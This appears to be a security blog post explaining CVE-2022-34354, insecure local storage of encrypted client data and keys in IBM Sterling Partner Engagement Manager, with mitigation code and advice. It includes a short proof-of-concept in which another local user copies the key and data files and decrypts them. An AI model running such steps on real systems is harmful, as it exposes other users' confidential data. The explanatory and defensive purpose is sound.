Security vulnerabilities can be catastrophic, especially when data thought to be protected turns out to be exposed. One such case is CVE-2022-34354, a weakness found in IBM Sterling Partner Engagement Manager (PEM) 2., which could let unauthorized users on the same machine read encrypted client data stored locally. In this post, we'll break down what this flaw is, how it can be exploited, and what you should do about it.

What is IBM Sterling Partner Engagement Manager?

IBM Sterling Partner Engagement Manager is a software solution for managing business partner relationships, automating onboarding workflows, and securely exchanging data. It’s widely used in large organizations, particularly for supply chain and business-to-business (B2B) transactions.

- Product: IBM Sterling Partner Engagement Manager 2.
- Issue: Encrypted storage of client data is saved to local storage in a way that allows other users on the same system to read it.

What’s the Risk?

The issue is that while client data is encrypted before being put on disk, it isn't isolated per user. Other users with local system access can potentially read this data and, if they can decrypt it (due to poor key management or local key storage), gain access to sensitive information.

> This is a classic example of insecure local storage of sensitive data.

How Does the Exposure Happen?

Imagine a multi-user system, like a shared Linux server. IBM PEM stores encrypted client data in a directory that's readable by all system users. If the encryption keys are also accessible, any user could read and decrypt another user’s confidential data.

Sample Code Snippet

The vulnerability can be conceptualized like this (not the actual PEM code, but a similar risk pattern):

import os
from cryptography.fernet import Fernet

# Write encrypted client data to a public location
def store_encrypted_data(client_data, key):
    fernet = Fernet(key)
    encrypted = fernet.encrypt(client_data.encode())
    with open('/tmp/pem_client_data.enc', 'wb') as file:
        file.write(encrypted)

# On a shared machine, any user can read this file:
def read_encrypted_data():
    with open('/tmp/pem_client_data.enc', 'rb') as file:
        return file.read()

If the key is also stored in /tmp or another world-readable directory, any user can decrypt the data:

from cryptography.fernet import Fernet

# The key sits in the same world-readable location as the ciphertext
def get_key():
    with open('/tmp/pem_key.key', 'rb') as keyfile:
        return keyfile.read()

# Anyone holding both files recovers the plaintext
def decrypt_data(encrypted_data, key):
    fernet = Fernet(key)
    return fernet.decrypt(encrypted_data).decode()

So if /tmp/pem_client_data.enc and /tmp/pem_key.key are readable by any user, the data isn’t really protected.

To actually exploit this vulnerability, a malicious user on the same system would:

1. Identify the storage location of encrypted data (e.g., /var/ibm/pem/data/ or a similar directory).
2. Gain access to the encryption keys (these might be stored in configuration files, environment variables, or another predictable location).

Below is a simplified proof-of-concept (POC) scenario, assuming access to both the data and the key:

# As user1, list the shared directory
ls -l /var/ibm/pem/data/client_data.enc
ls -l /var/ibm/pem/config/keys/client.key

# Switch to user2 (another user on the same server)
sudo su - user2

# Try reading the files
cat /var/ibm/pem/data/client_data.enc > /tmp/leaked_data.enc
cat /var/ibm/pem/config/keys/client.key > /tmp/leaked_client.key

# Use a small Python script to decrypt
python3
>>> from cryptography.fernet import Fernet
>>> key = open('/tmp/leaked_client.key', 'rb').read()
>>> f = Fernet(key)
>>> encrypted = open('/tmp/leaked_data.enc', 'rb').read()
>>> print(f.decrypt(encrypted).decode())
# Outputs the sensitive client data

Original References and Resources

- IBM Security Bulletin for CVE-2022-34354
- NVD (National Vulnerability Database) Entry for CVE-2022-34354
- IBM X-Force ID: 230424

How to Protect Your System

1. Update IBM Sterling PEM: IBM has addressed this issue in newer versions. Always apply the latest patches.
2. Check Permissions: Ensure client data files are not world-readable. Use chmod 600 (owner-only) or equivalent protections.
3. Separate Encryption Keys: Never store encryption keys together with the data. Use secure key vaults.
4. Audit File System: Regularly scan application directories for files that are world-readable or world-writable.
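A stdlib-only illustration of steps 2 and 4 above, added here as example code (not IBM's or PEM's): `store_protected` creates a file with mode 0600 from the moment it exists and refuses a parent directory that other users can traverse, and `audit_world_readable` flags files any local account can read. It assumes a POSIX filesystem; `demo`, the helper names and the placeholder files it writes to a scratch directory are all constructed for this example.

```python
import os
import stat
import tempfile

# Hypothetical hardened writer (not IBM's code): the mode is set at creation
# (O_CREAT|O_EXCL), so no other local user can open the file before a later chmod.
def store_protected(path: str, data: bytes) -> None:
    parent = os.path.dirname(path) or "."
    pmode = stat.S_IMODE(os.stat(parent).st_mode)
    if pmode & (stat.S_IRWXG | stat.S_IRWXO):
        # Refuse directories like /tmp that other users can traverse.
        raise PermissionError(f"{parent} is group/other accessible ({oct(pmode)})")
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)

# Audit helper: every regular file under root that other users can read.
def audit_world_readable(root: str) -> list:
    exposed = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            mode = stat.S_IMODE(os.lstat(full).st_mode)
            if mode & stat.S_IROTH:
                exposed.append((os.path.relpath(full, root), oct(mode)))
    return sorted(exposed)

def demo() -> dict:
    """Constructed scenario in a scratch directory: a data file and its key
    left world-readable (the bulletin's pattern) next to a file written with
    store_protected. Returns what the audit flags."""
    root = tempfile.mkdtemp()
    os.chmod(root, 0o700)
    for name in ("client_data.enc", "client.key"):
        weak = os.path.join(root, name)
        with open(weak, "wb") as fh:
            fh.write(b"constructed-placeholder-bytes")
        os.chmod(weak, 0o644)  # readable by any local account
    store_protected(os.path.join(root, "client_data_fixed.enc"), b"ciphertext")
    shared = os.path.join(root, "shared")
    os.mkdir(shared)
    os.chmod(shared, 0o755)  # a /tmp-like directory others can traverse
    try:
        store_protected(os.path.join(shared, "x.enc"), b"ciphertext")
        refused = False
    except PermissionError:
        refused = True
    return {"exposed": [p for p, _ in audit_world_readable(root)],
            "refused_shared_dir": refused}
```

Run `demo()` and only the two legacy files are reported; the file written by `store_protected` stays owner-only regardless of the process umask.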

Conclusion

CVE-2022-34354 is a sobering reminder that encryption alone isn't enough—storage security and access control are just as important. If you use IBM Sterling Partner Engagement Manager, make sure you review your system's file permissions and keep your software patched. Don’t let a weakness in local storage practices put your clients’ trust at risk.

Timeline

Published on: 11/16/2022 17:15:00 UTC
Last modified on: 11/18/2022 04:42:00 UTC